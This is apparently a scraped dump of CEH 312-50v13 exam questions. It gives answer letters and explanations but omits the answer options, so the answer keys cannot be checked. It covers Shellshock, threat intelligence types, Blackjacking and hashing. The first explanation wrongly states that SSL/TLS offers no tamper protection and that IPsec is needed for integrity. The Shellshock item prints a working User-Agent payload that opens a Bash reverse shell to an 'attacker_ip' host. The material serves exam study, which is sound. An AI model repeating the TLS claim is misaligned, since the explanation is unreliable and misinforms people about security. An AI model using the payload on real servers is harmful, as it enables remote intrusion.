You are the chief cybersecurity officer at CloudSecure Inc., and your team is responsible for securing a cloud-based application that handles sensitive customer data. To ensure that the data is protected from breaches, you have decided to implement encryption for both data-at-rest and data-in-transit. The development team suggests using SSL/TLS for securing data in transit. However, you also want to implement a mechanism to detect if the data was tampered with during transmission. Which of the following should you propose?
Correct Answer: A
SSL/TLS is a protocol that provides encryption and authentication for data in transit between a client and a server. However, SSL/TLS does not provide any protection against data tampering, which is the alteration, deletion, or insertion of data without authorization or proper validation. Data tampering can compromise the integrity and accuracy of the data, and potentially lead to breaches or fraud.
To detect and prevent data tampering, you should implement IPsec in addition to SSL/TLS. IPsec is a protocol that provides encryption, authentication, and integrity for data in transit at the network layer. IPsec uses cryptographic mechanisms, such as digital signatures and hash-based message authentication codes (HMACs), to verify the identity of the sender and the receiver, and to ensure that the data has not been modified during transmission. IPsec can also provide replay protection, which prevents an attacker from retransmitting old or duplicate packets. By combining SSL/TLS and IPsec, you can achieve a higher level of security and reliability for your cloud-based application.
References:
* EC-Council CEHv12 Courseware Module 18: Cryptography, page 18-20
* EC-Council CEHv12 Courseware Module 19: Cloud Computing, page 19-29
* A comprehensive guide to data tampering
* Tamper Detection
312-50v13 Exam Question 72
What is the most common method to exploit the "Bash Bug" or "Shellshock" vulnerability?
Correct Answer: C
In CEH v13 Module 06: Malware Threats, the Shellshock vulnerability (CVE-2014-6271) is described as a severe bug in the Bash shell where specially crafted environment variables could be used to execute arbitrary commands.
The most common attack vector: Web servers using CGI scripts written in Bash. Attackers send malicious HTTP requests to CGI endpoints where Bash executes commands.
Exploitation looks like:
    User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1
Reference:
* CEH v13 Module 06 - Shellshock Vulnerability Explanation
* National Vulnerability Database: CVE-2014-6271
312-50v13 Exam Question 73
Roma is a member of a security team. She was tasked with protecting the internal network of an organization from imminent threats. To accomplish this task, Roma fed threat intelligence into the security devices in a digital format to block and identify inbound and outbound malicious traffic entering the organization's network. Which type of threat intelligence is used by Roma to secure the internal network?
Correct Answer: C
In CEH v13 Module 01: Information Security Fundamentals, the types of threat intelligence are categorized as Strategic, Tactical, Operational, and Technical, each serving different security roles.
Tactical Threat Intelligence - Correct Answer
Definition: Provides information in a machine-readable format such as indicators of compromise (IOCs) - including IP addresses, file hashes, URLs, domains, and signatures.
Purpose: Used to update security appliances like firewalls, IDS/IPS, endpoint protection to automatically detect and block threats in real-time.
Roma used threat intelligence in this exact way - automating detection and blocking via security tools.
Why Other Options Are Incorrect:
* A: Technical Threat Intelligence: Often overlaps with tactical but usually refers to low-level indicators used for internal analysis, not device-ready feeds.
* B: Operational Threat Intelligence: Focuses on specific campaigns, attacker TTPs, and is generally not automated or directly used in security appliances.
* D: Strategic Threat Intelligence: High-level, non-technical insights for executives and decision-makers - used for long-term planning, not immediate threat blocking.
Reference:
* Module 01 - Threat Intelligence Types and Usage Scenarios
* CEH iLabs: Ingesting IOCs into a Firewall for Tactical Threat Defense
* CEH v13 eBook: Threat Intelligence Integration into Defensive Systems
312-50v13 Exam Question 74
A large company intends to use BlackBerry for corporate mobile phones and a security analyst is assigned to evaluate the possible threats. The analyst will use the Blackjacking attack method to demonstrate how an attacker could circumvent perimeter defenses and gain access to the corporate network. What tool should the analyst use to perform a Blackjacking attack?
Correct Answer: B
The Blackjacking attack involves leveraging a compromised BlackBerry device and its connection through the BlackBerry Enterprise Server (BES) to tunnel back into the internal corporate network, bypassing perimeter firewalls. The tool used in this method is BBProxy. BBProxy is installed on the BlackBerry device and establishes a covert tunnel via BES, allowing attackers to pivot into the internal LAN from outside the perimeter.
Reference - CEH v13 Official Study Guide: Module 17: Hacking Mobile Platforms
Quote: "Blackjacking is a technique in which attackers use BBProxy to exploit a trusted path from a BlackBerry device to the corporate LAN through BES."
Incorrect Options Explained:
* A) Paros Proxy is a web proxy used for intercepting HTTP/S traffic.
* C) Blooover is used for Bluetooth security auditing.
* D) BBCrack is used for password recovery on BlackBerry devices, not for tunneling.
312-50v13 Exam Question 75
What is the main security service a cryptographic hash provides?
Correct Answer: C
Comprehensive and Detailed Explanation:
Cryptographic hash functions provide:
* Integrity: Any change in the input changes the output hash.
* Collision Resistance: It is computationally infeasible to find two inputs that produce the same hash.
This ensures data is not altered during transmission.
From CEH v13 Courseware: Module 10: Cryptography - Hashing Functions (e.g., SHA-256, MD5)
Reference: NIST SP 800-107 - "Cryptographic hash functions provide integrity by detecting changes in data via collision-resistant functions."